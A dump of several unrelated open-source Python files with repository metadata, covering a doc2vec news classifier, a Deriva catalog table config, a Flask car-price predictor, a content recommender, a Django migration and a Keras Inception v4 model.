errorPosition = s.find(extraString.split(" ", 3)[2])
formerString = s.split(extraString.split(" ", 3)[2])
print(formerString[0] + extraString.split(" ", 3)[2])
print(" " * int(errorPosition) + "^")
exit()
else:
account = extraString.split(" ", 3)[3:]
# account syntax error
p = re.compile('[a-zA-Z]+[0-9]+$')
m = p.match(account[0])
if not m:
errorPosition = s.find(account[0])
formerString = s.split(account[0])
print(formerString[0] + account[0])
print(" " * int(errorPosition) + "^")
exit()
# no syntax error, print result
if action == "CancelReqeusts":
print("CANCEL (Symbol, AccountID) VALUES ('{}', '{}')").format(symbol, account)
elif action == "BuyRequests" or "SellRequests":
print("INSERT INTO " + action + " (NumShares, Symbol, MaxPrice, AccountID) VALUES ('{}', '{}', '{}', '{}')").format(num1, symbol, num2, account)
|
[
"hsn1017@vt.edu"
] |
hsn1017@vt.edu
|
e752a0802891174af75fc03ead6bf8975f0782ba
|
19274b29218a3bff5342c725cd667992fb6bb449
|
/stage1_classify/classfication.py
|
966db8a36f2e554e0684602416064a7e37538a8b
|
[] |
no_license
|
qvbit/News-Event-Extraction-System
|
64dcae715fce5e33503f039734c8c218bce6630e
|
e592917891bcfb361c367ddad7c13247e95378ef
|
refs/heads/master
| 2020-04-05T20:47:22.779473
| 2019-02-04T14:54:12
| 2019-02-04T14:54:12
| 157,195,262
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,378
|
py
|
import pandas as pd
import numpy as np
import pickle
import itertools
import functools
import collections
import random
from sklearn.linear_model import LogisticRegression
from sklearn import svm
from sklearn import tree
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.metrics import average_precision_score
from sklearn.metrics import f1_score
from sklearn.metrics import precision_recall_curve
from sklearn.utils.fixes import signature
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_validate
from sklearn.model_selection import train_test_split
from sklearn.neighbors import NearestNeighbors
from sklearn.metrics import roc_auc_score
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from gensim.test.utils import get_tmpfile
from gensim.utils import simple_preprocess
params = {'vector_size': [400],
'min_count': [1, 2],
'epochs': [20, 50, 100],
'window': [5, 10, 15],
'steps': [20, 30, 40],
'dm': [0, 1],
'threshold': [1e-2, 1e-5],
'negative': [5, 15]
}
def process(df):
df.dropna(subset=['body', 'headline', 'summary'], thresh=3, inplace=True)
df['categories'] = df['categories'].apply(lambda x: '. '.join(x))
df['train'] = [t + '. ' + h + '. ' + s + ' ' + b for t, h, s, b in
zip(list(df['categories']), list(df['headline']), list(df['summary']), list(df['body']))]
return df
def strat_test_train(X, y, test_size):
strat = StratifiedShuffleSplit(n_splits=1, test_size=test_size, random_state=42)
for train_index, test_index in strat.split(X, y):
X_train, X_test = [X[i] for i in train_index], [X[i] for i in test_index]
y_train, y_test = [y[i] for i in train_index], [y[i] for i in test_index]
return X_train, y_train, X_test, y_test
def read_corpus(data):
for i, line in enumerate(data):
yield TaggedDocument(simple_preprocess(line), tags=[i])
def doc2vec(data, vector_size, dm, threshold, negative, min_count, epochs, window):
model = Doc2Vec(vector_size=vector_size,
dm=dm,
min_count=min_count,
window=window,
threshold=threshold,
negative=negative,
epocphs=epochs,
workers=8)
model.build_vocab(data)
model.train(data, total_examples=model.corpus_count, epochs=model.epochs)
return model
def embeddings(model, X, steps):
z = [model.infer_vector(X[doc_id].words, steps=steps) for doc_id in range(len(X))]
return z
def classifier(X_train, y_train):
clf = svm.SVC()
clf.fit(X_train, y_train)
def product_dict(**kwargs):
keys = kwargs.keys()
vals = kwargs.values()
for instance in itertools.product(*vals):
yield dict(zip(keys, instance))
def flatten(x):
if isinstance(x, collections.Iterable) and not isinstance(x, tuple) and not isinstance(x, str) and not isinstance(x, dict):
return [a for i in x for a in flatten(i)]
else:
return [x]
def average(l):
return functools.reduce(lambda x, y: x + y, l) / len(l)
def extract_pos(X_tr, y_tr):
return np.array([v for v, l in zip(X_tr, y_tr) if l==1])
def unpack_kwargs(**kwargs):
vector_size = kwargs.pop('vector_size')
min_count = kwargs.pop('min_count')
epochs = kwargs.pop('epochs')
window = kwargs.pop('window')
steps = kwargs.pop('steps')
dm = kwargs.pop('dm')
threshold = kwargs.pop('threshold')
negative = kwargs.pop('negative')
return vector_size, min_count, epochs, window, steps, dm, threshold, negative
def full_pipeline(scores, X_tr, y_tr, all_data, **kwargs):
vector_size, min_count, epochs, window, steps, dm, threshold, negative = unpack_kwargs(**kwargs)
print('Training doc2vec.. this will take some time')
d2v = doc2vec(all_data, vector_size=vector_size, dm=dm, threshold=threshold, negative=negative, min_count=min_count, epochs=epochs, window=window)
X_tr = embeddings(d2v, X_tr, steps=steps)
skf = StratifiedKFold(n_splits=5, random_state=42)
temp, i = [], 0
print('Cross-validating SVM')
for train_index, test_index in skf.split(X_tr, y_tr):
print('Split %r...' % i)
X_tr_cv, X_te_cv = [X_tr[i] for i in train_index], [X_tr[i] for i in test_index]
y_tr_cv, y_te_cv = [y_tr[i] for i in train_index], [y_tr[i] for i in test_index]
clf = svm.SVC()
clf.fit(X_tr_cv, y_tr_cv)
y_pr_cv = clf.predict(X_te_cv)
c = confusion_matrix(y_te_cv, y_pr_cv)
print(c)
p = precision_score(y_te_cv, y_pr_cv)
r = recall_score(y_te_cv, y_pr_cv)
f1 = f1_score(y_te_cv, y_pr_cv)
a = accuracy_score(y_te_cv, y_pr_cv)
temp.append([p, r, f1, a])
i+=1
scores.append(temp)
print('----------------------------------------------------')
return scores
if __name__ == '__main__':
df_eq = pd.read_pickle('../dataframes/df_eq_label.pkl')
with open('../dataframes/all_data.pkl', 'rb') as f:
all_data = pickle.load(f)
df_eq = process(df_eq)
X = list(df_eq['train'])
y = list(df_eq['label'])
X_train, y_train, X_test, y_test = strat_test_train(X, y, 0.2)
X_train = list(read_corpus(X_train))
results = {}
scores = []
for i, param in enumerate(list(product_dict(**params))):
print('Checking set %r of parameters...' % i)
scores = full_pipeline(scores, X_train, y_train, all_data, **param)
results[i] = flatten( [param, list(zip(*scores[i]))] )
data = [[key] + [val for val in vals] for key, vals in results.items()]
pr = pd.DataFrame(data, columns=['Model #', 'Parameters', 'Precision', 'Recall', 'F1', 'Accuracy'])
pr['Precision'] = pr['Precision'].apply(average)
pr['Recall'] = pr['Recall'].apply(average)
pr['F1'] = pr['F1'].apply(average)
pr['Accuracy'] = pr['Accuracy'].apply(average)
pd.to_pickle(pr, '../dataframes/grid_search_results.pkl')
|
[
"noreply@github.com"
] |
noreply@github.com
|
25eaf0a29411821417765885863acfd5166a02e3
|
7298d1692c6948f0880e550d6100c63a64ce3ea1
|
/deriva-annotations/catalog99/catalog-configs/Vocab/ihm_residues_not_modeled_reason.py
|
9a62ee7fbe832a6a342ee44c46b17d4607a9f500
|
[] |
no_license
|
informatics-isi-edu/protein-database
|
b7684b3d08dbf22c1e7c4a4b8460248c6f0d2c6d
|
ce4be1bf13e6b1c22f3fccbb513824782609991f
|
refs/heads/master
| 2023-08-16T10:24:10.206574
| 2023-07-25T23:10:42
| 2023-07-25T23:10:42
| 174,095,941
| 2
| 0
| null | 2023-06-16T19:44:43
| 2019-03-06T07:39:14
|
Python
|
UTF-8
|
Python
| false
| false
| 5,585
|
py
|
import argparse
from deriva.core import ErmrestCatalog, AttrDict, get_credential
import deriva.core.ermrest_model as em
from deriva.core.ermrest_config import tag as chaise_tags
from deriva.utils.catalog.manage.update_catalog import CatalogUpdater, parse_args
groups = {
'pdb-reader': 'https://auth.globus.org/8875a770-3c40-11e9-a8c8-0ee7d80087ee',
'pdb-writer': 'https://auth.globus.org/c94a1e5c-3c40-11e9-a5d1-0aacc65bfe9a',
'pdb-admin': 'https://auth.globus.org/0b98092c-3c41-11e9-a8c8-0ee7d80087ee',
'pdb-curator': 'https://auth.globus.org/eef3e02a-3c40-11e9-9276-0edc9bdd56a6',
'isrd-staff': 'https://auth.globus.org/176baec4-ed26-11e5-8e88-22000ab4b42b',
'pdb-submitter': 'https://auth.globus.org/99da042e-64a6-11ea-ad5f-0ef992ed7ca1'
}
table_name = 'ihm_residues_not_modeled_reason'
schema_name = 'Vocab'
column_annotations = {
'ID': {},
'URI': {},
'Name': {},
'Description': {},
'Synonyms': {},
'Owner': {}
}
column_comment = {
'ID': 'The preferred Compact URI (CURIE) for this term.',
'URI': 'The preferred URI for this term.',
'Name': 'None',
'Description': 'None',
'Synonyms': 'Alternate human-readable names for this term.',
'Owner': 'Group that can update the record.'
}
column_acls = {}
column_acl_bindings = {}
column_defs = [
em.Column.define(
'ID',
em.builtin_types['ermrest_curie'],
nullok=False,
default='PDB:{RID}',
comment=column_comment['ID'],
),
em.Column.define(
'URI',
em.builtin_types['ermrest_uri'],
nullok=False,
default='/id/{RID}',
comment=column_comment['URI'],
),
em.Column.define(
'Name', em.builtin_types['text'], nullok=False, comment=column_comment['Name'],
),
em.Column.define(
'Description',
em.builtin_types['markdown'],
nullok=False,
comment=column_comment['Description'],
),
em.Column.define('Synonyms', em.builtin_types['text[]'], comment=column_comment['Synonyms'],
),
em.Column.define('Owner', em.builtin_types['text'], comment=column_comment['Owner'],
),
]
visible_columns = {
'*': [
'RID', 'Name', 'Description', 'ID', 'URI',
['Vocab', 'ihm_residues_not_modeled_reason_term_RCB_fkey'],
['Vocab', 'ihm_residues_not_modeled_reason_term_RMB_fkey'], 'RCT', 'RMT',
['Vocab', 'ihm_residues_not_modeled_reason_term_Owner_fkey']
]
}
table_display = {'row_name': {'row_markdown_pattern': '{{{Name}}}'}}
table_annotations = {
chaise_tags.table_display: table_display,
chaise_tags.visible_columns: visible_columns,
}
table_comment = 'A set of controlled vocabular terms.'
table_acls = {}
table_acl_bindings = {
'released_reader': {
'types': ['select'],
'scope_acl': [groups['pdb-submitter']],
'projection': ['RID'],
'projection_type': 'nonnull'
},
'self_service_group': {
'types': ['update', 'delete'],
'scope_acl': ['*'],
'projection': ['Owner'],
'projection_type': 'acl'
},
'self_service_creator': {
'types': ['update', 'delete'],
'scope_acl': ['*'],
'projection': ['RCB'],
'projection_type': 'acl'
}
}
key_defs = [
em.Key.define(
['Name'], constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_Namekey1']],
),
em.Key.define(
['RID'], constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_RIDkey1']],
),
em.Key.define(
['ID'], constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_IDkey1']],
),
em.Key.define(
['URI'], constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_URIkey1']],
),
]
fkey_defs = [
em.ForeignKey.define(
['RCB'],
'public',
'ERMrest_Client', ['ID'],
constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_RCB_fkey']],
),
em.ForeignKey.define(
['RMB'],
'public',
'ERMrest_Client', ['ID'],
constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_RMB_fkey']],
),
em.ForeignKey.define(
['Owner'],
'public',
'Catalog_Group', ['ID'],
constraint_names=[['Vocab', 'ihm_residues_not_modeled_reason_term_Owner_fkey']],
acls={
'insert': [groups['pdb-curator']],
'update': [groups['pdb-curator']]
},
acl_bindings={
'set_owner': {
'types': ['update', 'insert'],
'scope_acl': ['*'],
'projection': ['ID'],
'projection_type': 'acl'
}
},
),
]
table_def = em.Table.define(
table_name,
column_defs=column_defs,
key_defs=key_defs,
fkey_defs=fkey_defs,
annotations=table_annotations,
acls=table_acls,
acl_bindings=table_acl_bindings,
comment=table_comment,
provide_system=True
)
def main(catalog, mode, replace=False, really=False):
updater = CatalogUpdater(catalog)
table_def['column_annotations'] = column_annotations
table_def['column_comment'] = column_comment
updater.update_table(mode, schema_name, table_def, replace=replace, really=really)
if __name__ == "__main__":
host = 'pdb.isrd.isi.edu'
catalog_id = 99
mode, replace, host, catalog_id = parse_args(host, catalog_id, is_table=True)
catalog = ErmrestCatalog('https', host, catalog_id=catalog_id, credentials=get_credential(host))
main(catalog, mode, replace)
|
[
"brinda.vallat@rcsb.org"
] |
brinda.vallat@rcsb.org
|
f0170ac151345298ff4e2d5ba825617e0b46da30
|
597c0143c3ff325f2bd13e915623f6b5b29dcec9
|
/p35.py
|
fdb51ee0232a5b205bdcf312e25061b3b43391d0
|
[] |
no_license
|
jpgerek/projecteuler
|
77949426d629c0be629857958c28f451961d1608
|
79e35a8e6149946769149714607556238bfe12ed
|
refs/heads/master
| 2016-09-05T14:09:45.821755
| 2013-02-01T19:34:41
| 2013-02-01T19:34:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
py
|
import math
import itertools
from euler import is_prime, gen_primes
def is_circular_prime(prime):
digits = [c for c in str(prime)]
for x in xrange(0,len(digits)):
digits.append(digits.pop(0))
rotated_num = int(''.join(digits))
if not is_prime(rotated_num):
return False
return True
print len([prime for prime in gen_primes(1000000) if is_circular_prime(prime)])
|
[
"juanpablo@guereca.com"
] |
juanpablo@guereca.com
|
d403e1d92d5fada8b340149b66f4add0b2857bc3
|
3e9830b5db4e2a51885e4481f75f8b367ef90c69
|
/app/app/seeder/seed_pasien.py
|
772366ed47c3bb30a666208844adfdd70198b406
|
[] |
no_license
|
dickymahfudin/sistem-rumah-sakit
|
280c2b296440798da85109b57b7033a18e57a1cd
|
b1ff1c146b666e04258ce7fc34c389b4c261691e
|
refs/heads/master
| 2023-04-05T16:49:08.790493
| 2021-04-22T05:21:24
| 2021-04-22T05:21:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 538
|
py
|
import random
from sqlalchemy.orm import Session
from .base_seeder import faker
from ..crud.crud_pasien import crud_pasien
from ..schemas.pasien import PasienCreate
def seed_pasien(iter, db):
for i in range(iter):
pasien = PasienCreate(
nama=faker.name(),
alamat=faker.address(),
tanggal_lahir=faker.date(),
tempat_lahir=faker.city()[:20],
no_hp=faker.phone_number(),
bpjs=faker.pybool(),
rfid=str(faker.random_int(10)),
)
crud_pasien.create(
db=db,
obj_in=pasien
)
|
[
"hadyanadamn@gmail.com"
] |
hadyanadamn@gmail.com
|
f204104b60002eee4665f79f8e218ef2c862bc5a
|
9cb6c9f95449e6321566d65081d7b83ad1923ed7
|
/src/item_recommender.py
|
68d9f4b3968e50eeea4336c2300de43009684722
|
[] |
no_license
|
yamasjose11/tedtalk-recommendation-system
|
8bf866c5cc697c6e8b81572368e1c77afa629524
|
8d37dbbced9987d02c1af3f3403106994608cfa4
|
refs/heads/main
| 2023-02-24T22:42:02.336433
| 2021-02-02T18:18:19
| 2021-02-02T18:18:19
| 333,611,564
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,835
|
py
|
from sklearn.metrics.pairwise import cosine_similarity
import pandas as pd
import numpy as np
class ItemRecommender():
'''
Content based item recommender
'''
def __init__(self, similarity_measure=None):
self.similarity_matrix = None
self.item_names = None
if similarity_measure == None:
self.similarity_measure = cosine_similarity
else:
self.similarity_measure = similarity_measure
def fit(self, X, titles=None):
'''
Takes a numpy array of the item attributes and creates the similarity matrix
INPUT -
X: NUMPY ARRAY - Rows are items, columns are feature values / or DF
titles: LIST - List of the item names/titles in order of the numpy arrray
OUTPUT - None
Notes: You might want to keep titles and X as attributes to refer to them later
Create the a similarity matrix of item to item similarity
'''
# While keeping this as a sparse matrix would be best the cosign sim
# function returns a array so there is no reason.
if isinstance(X, pd.DataFrame):
self.item_counts = X
self.item_names = X.index
self.similarity_df = pd.DataFrame(self.similarity_measure(X.values, X.values),
index = self.item_names)
else:
self.item_counts = X
self.similarity_df = pd.DataFrame(self.similarity_measure(X, X),
index = titles)
self.item_names = self.similarity_df.index
def get_recommendations(self, item, n=5):
'''
Returns the top n items related to the item passed in
INPUT:
item - STRING - Name of item in the original DataFrame
n - INT - Number of top related items to return
OUTPUT:
items - List of the top n related item names
For a given item find the n most similar items to it (this can be done using the similarity matrix created in the fit method)
'''
return self.item_names[self.similarity_df.loc[item].values.argsort()[-(n+1):-1]].values[::-1]
def get_user_profile(self, items):
'''
Takes a list of items and returns a user profile. A vector representing the likes of the user.
INPUT:
items - LIST - list of movie names user likes / has seen
OUTPUT:
user_profile - NP ARRAY - array representing the likes of the user
The columns of this will match the columns of the trained on matrix
Using the list of items liked by the user create a profile which will be a 1 x number of features array. This should be the addition of the values for all liked item features (you can choose how to normalize if you think it is needed)
'''
user_profile = np.zeros(self.item_counts.shape[1])
for item in items:
user_profile += self.item_counts.loc[item].values
return user_profile
def get_user_recommendation(self, items, n=5):
'''
Takes a list of movies user liked and returns the top n items for that user
INPUT
items - LIST - list of movie names user likes / has seen
n - INT - number of items to return
OUTPUT
items - LIST - n recommended items
Make use of the get_user_profile method to create a user profile that will be used to get the similarity to all items and recommend the top n.
'''
num_items = len(items)
user_profile = self.get_user_profile(items)
user_sim = self.similarity_measure(self.item_counts, user_profile.reshape(1,-1))
return self.item_names[user_sim[:,0].argsort()[-(num_items+n):-num_items]].values[::-1]
|
[
"yamasjose11@gmail.com"
] |
yamasjose11@gmail.com
|
4b28b8979101e0dd287e1c26d062c0b3d58b0f82
|
6ebe5412b16bb48d89b9e7e3268dc5712a05bc75
|
/app.py
|
8a1442f41d1d633179a3f29ae8847204b1becb0e
|
[] |
no_license
|
Nishanbuyo/car_prediction
|
d850cf2f6d61ea181a27ed17e31a1c991e71937f
|
d7f7552db39e5b54950f6f39679e13d3f2c42149
|
refs/heads/master
| 2023-01-12T15:47:14.556471
| 2020-11-06T11:31:57
| 2020-11-06T11:31:57
| 310,578,096
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,021
|
py
|
from flask import Flask, render_template, request
import jsonify
import requests
import joblib
import numpy as np
import sklearn
from sklearn.preprocessing import StandardScaler
app = Flask(__name__)
model = joblib.load('linear-regressor.joblib')
@app.route('/',methods=['GET'])
def Home():
return render_template('index.html')
standard_to = StandardScaler()
@app.route("/predict", methods=['POST'])
def predict():
Fuel_Type_Diesel=0
if request.method == 'POST':
Year = int(request.form['Year'])
Present_Price=float(request.form['Present_Price'])
Kms_Driven=int(request.form['Kms_Driven'])
Kms_Driven2=np.log(Kms_Driven)
Owner=int(request.form['Owner'])
Fuel_Type_Petrol=request.form['Fuel_Type_Petrol']
if(Fuel_Type_Petrol=='Petrol'):
Fuel_Type_Petrol=1
Fuel_Type_Diesel=0
elif(Fuel_Type_Petrol=='Diesel'):
Fuel_Type_Petrol=0
Fuel_Type_Diesel=1
else:
Fuel_Type_Petrol=0
Fuel_Type_Diesel=0
Year=2020-Year
Seller_Type_Individual=request.form['Seller_Type_Individual']
if(Seller_Type_Individual=='Individual'):
Seller_Type_Individual=1
else:
Seller_Type_Individual=0
Transmission_Mannual=request.form['Transmission_Mannual']
if(Transmission_Mannual=='Mannual'):
Transmission_Mannual=1
else:
Transmission_Mannual=0
prediction=model.predict([[Present_Price,Kms_Driven,Owner,Year,Fuel_Type_Diesel,Fuel_Type_Petrol,Seller_Type_Individual,Transmission_Mannual]])
output=round(prediction[0],2)
if output<0:
return render_template('index.html',prediction_texts="Sorry you cannot sell this car")
else:
return render_template('index.html',prediction_text="You Can Sell The Car at {}".format(output))
else:
return render_template('index.html')
if __name__=="__main__":
app.run(debug=True)
|
[
"nishanbuyo05@gmail.com"
] |
nishanbuyo05@gmail.com
|
ff6e723cffc4626cbc971d1900ff2668dc155b64
|
5ea8955f860a3a664a8c778e7cf41f024949b73d
|
/blog/migrations/0001_initial.py
|
fe1ace398611955eb95b0e25c016002fb3ec2724
|
[] |
no_license
|
deolands/my-first-blog
|
3a881c4a1051442cf424a9724d728fdc3528d8e0
|
b14051d8ca336d813d68cc92207dc19d3c703771
|
refs/heads/master
| 2020-06-19T11:58:55.592977
| 2016-11-27T20:58:51
| 2016-11-27T20:58:51
| 74,906,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,051
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-27 18:22
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"deolands@gmail.com"
] |
deolands@gmail.com
|
8b5ba43ea0cb1a80285b264a1c64c0896cc7703c
|
6f7e55851425097567637e0667d8407a6c7c6666
|
/tweets/migrations/0009_auto_20210602_2211.py
|
128ac2f934c458857c1952004d640810e5b88369
|
[] |
no_license
|
sumit9mishra/tweeter-clone
|
00733e7aa4c92c13b55abd79bb0703bbe7570428
|
0b64e50907eb32c07dc0099b9144514af18a13ef
|
refs/heads/main
| 2023-05-07T08:00:22.068384
| 2021-06-02T23:42:20
| 2021-06-02T23:42:20
| 372,466,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 682
|
py
|
# Generated by Django 3.0 on 2021-06-02 16:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('tweets', '0008_auto_20210602_2159'),
]
operations = [
migrations.AlterField(
model_name='tweet',
name='parent',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='tweets.Tweet'),
),
migrations.AlterField(
model_name='tweetlike',
name='tweet',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tweets.Tweet'),
),
]
|
[
"sumitmishrab@gmail.com"
] |
sumitmishrab@gmail.com
|
cc1215a5f8506aa20763f0de669445ebd84802b5
|
d76b52cdddad23c0c5746a71e16978350c84d359
|
/src/model/inception_v4.py
|
7cdf540d3a1903548d01bb3c53fc22b1b1846f77
|
[] |
no_license
|
Mahedi-61/kaggle_dogs_vs_cats
|
af24454c9bcf3ae21657a4fa2c98394791fd3878
|
2604d5ffef0f347c55030c741fbd99789b435b1e
|
refs/heads/master
| 2021-09-07T06:07:00.960617
| 2018-02-18T13:45:33
| 2018-02-18T13:45:33
| 118,255,946
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,613
|
py
|
'''
Copyright 2017 TensorFlow Authors and Kent Sommer
'''
#########################################################################################
# Implements the Inception Network v4 (http://arxiv.org/pdf/1602.07261v1.pdf) in Keras. #
#########################################################################################
from keras.layers import (MaxPooling2D, Conv2D, AveragePooling2D,
Input, Dropout, Dense, Flatten,
Activation, BatchNormalization)
from keras.layers.merge import concatenate
from keras import regularizers
from keras import initializers
from keras.models import Model
from keras import backend as K
def conv2d_bn(x,
nb_filter,
num_row,
num_col,
padding='same',
strides=(1, 1),
use_bias=False):
"""
Utility function to apply conv + BN.
(Slightly modified from official keras inception_v3.py)
"""
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
x = Conv2D(nb_filter,
(num_row, num_col),
strides=strides,
padding=padding,
use_bias=use_bias,
kernel_regularizer=regularizers.l2(0.00004),
kernel_initializer=initializers.VarianceScaling(scale=2.0,
mode='fan_in', distribution='normal', seed=None))(x)
x = BatchNormalization(axis=channel_axis, momentum=0.9997, scale=False)(x)
x = Activation('relu')(x)
return x
def block_inception_a(input_):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
branch_0 = conv2d_bn(input_, 96, 1, 1)
branch_1 = conv2d_bn(input_, 64, 1, 1)
branch_1 = conv2d_bn(branch_1, 96, 3, 3)
branch_2 = conv2d_bn(input_, 64, 1, 1)
branch_2 = conv2d_bn(branch_2, 96, 3, 3)
branch_2 = conv2d_bn(branch_2, 96, 3, 3)
branch_3 = AveragePooling2D((3,3), strides=(1,1), padding='same')(input_)
branch_3 = conv2d_bn(branch_3, 96, 1, 1)
x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
return x
def block_reduction_a(input_):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
branch_0 = conv2d_bn(input_, 384, 3, 3, strides=(2,2), padding='valid')
branch_1 = conv2d_bn(input_, 192, 1, 1)
branch_1 = conv2d_bn(branch_1, 224, 3, 3)
branch_1 = conv2d_bn(branch_1, 256, 3, 3, strides=(2,2), padding='valid')
branch_2 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(input_)
x = concatenate([branch_0, branch_1, branch_2], axis=channel_axis)
return x
def block_inception_b(input_):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
branch_0 = conv2d_bn(input_, 384, 1, 1)
branch_1 = conv2d_bn(input_, 192, 1, 1)
branch_1 = conv2d_bn(branch_1, 224, 1, 7)
branch_1 = conv2d_bn(branch_1, 256, 7, 1)
branch_2 = conv2d_bn(input_, 192, 1, 1)
branch_2 = conv2d_bn(branch_2, 192, 7, 1)
branch_2 = conv2d_bn(branch_2, 224, 1, 7)
branch_2 = conv2d_bn(branch_2, 224, 7, 1)
branch_2 = conv2d_bn(branch_2, 256, 1, 7)
branch_3 = AveragePooling2D((3,3), strides=(1,1), padding='same')(input_)
branch_3 = conv2d_bn(branch_3, 128, 1, 1)
x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
return x
def block_reduction_b(input_):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
branch_0 = conv2d_bn(input_, 192, 1, 1)
branch_0 = conv2d_bn(branch_0, 192, 3, 3, strides=(2, 2), padding='valid')
branch_1 = conv2d_bn(input_, 256, 1, 1)
branch_1 = conv2d_bn(branch_1, 256, 1, 7)
branch_1 = conv2d_bn(branch_1, 320, 7, 1)
branch_1 = conv2d_bn(branch_1, 320, 3, 3, strides=(2,2), padding='valid')
branch_2 = MaxPooling2D((3, 3), strides=(2, 2), padding='valid')(input_)
x = concatenate([branch_0, branch_1, branch_2], axis=channel_axis)
return x
def block_inception_c(input_):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
branch_0 = conv2d_bn(input_, 256, 1, 1)
branch_1 = conv2d_bn(input_, 384, 1, 1)
branch_10 = conv2d_bn(branch_1, 256, 1, 3)
branch_11 = conv2d_bn(branch_1, 256, 3, 1)
branch_1 = concatenate([branch_10, branch_11], axis=channel_axis)
branch_2 = conv2d_bn(input_, 384, 1, 1)
branch_2 = conv2d_bn(branch_2, 448, 3, 1)
branch_2 = conv2d_bn(branch_2, 512, 1, 3)
branch_20 = conv2d_bn(branch_2, 256, 1, 3)
branch_21 = conv2d_bn(branch_2, 256, 3, 1)
branch_2 = concatenate([branch_20, branch_21], axis=channel_axis)
branch_3 = AveragePooling2D((3, 3), strides=(1, 1), padding='same')(input_)
branch_3 = conv2d_bn(branch_3, 256, 1, 1)
x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
return x
def inception_v4_base(input_):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
# Input Shape is 299 x 299 x 3 (th) or 3 x 299 x 299 (th)
net = conv2d_bn(input_, 32, 3, 3, strides=(2,2), padding='valid')
net = conv2d_bn(net, 32, 3, 3, padding='valid')
net = conv2d_bn(net, 64, 3, 3)
branch_0 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(net)
branch_1 = conv2d_bn(net, 96, 3, 3, strides=(2,2), padding='valid')
net = concatenate([branch_0, branch_1], axis=channel_axis)
branch_0 = conv2d_bn(net, 64, 1, 1)
branch_0 = conv2d_bn(branch_0, 96, 3, 3, padding='valid')
branch_1 = conv2d_bn(net, 64, 1, 1)
branch_1 = conv2d_bn(branch_1, 64, 1, 7)
branch_1 = conv2d_bn(branch_1, 64, 7, 1)
branch_1 = conv2d_bn(branch_1, 96, 3, 3, padding='valid')
net = concatenate([branch_0, branch_1], axis=channel_axis)
branch_0 = conv2d_bn(net, 192, 3, 3, strides=(2,2), padding='valid')
branch_1 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(net)
net = concatenate([branch_0, branch_1], axis=channel_axis)
# 35 x 35 x 384
# 4 x Inception-A blocks
for idx in range(4):
net = block_inception_a(net)
# 35 x 35 x 384
# Reduction-A block
net = block_reduction_a(net)
# 17 x 17 x 1024
# 7 x Inception-B blocks
for idx in range(7):
net = block_inception_b(net)
# 17 x 17 x 1024
# Reduction-B block
net = block_reduction_b(net)
# 8 x 8 x 1536
# 3 x Inception-C blocks
for idx in range(3):
net = block_inception_c(net)
return net
def InceptionV4(include_top = False,
input_shape = (299, 299, 3),
weights_path = None,
input_tensor = None):
'''
Creates the inception v4 network
Args:
input_shape = default (299, 299, 3)
for full model image size should be default value.
otherwise pooling window size should be adjusted.
for without top image size should be (139, 129 ,3) or more than that.
dropout_keep_prob: float, the fraction to keep before final layer.
Returns:
logits: the logits outputs of the model.
'''
# Input Shape is 299 x 299 x 3 (tf) or 3 x 299 x 299 (th)
if input_tensor is None:
img_input = Input(shape = input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
# Make inception base
x = inception_v4_base(img_input)
# Final pooling and prediction
if include_top:
# 1 x 1 x 1536
x = AveragePooling2D((8,8), padding='valid')(x)
x = Dropout(0.2)(x)
x = Flatten()(x)
# 1536
x = Dense(1000, activation='softmax')(x)
#Since layers are not given name hence
#we can't upload weights by layer name
#so for with or without top two seperate weight have to use
#create model
model = Model(img_input, x, name='inception_v4')
if weights_path:
model.load_weights(weights_path)
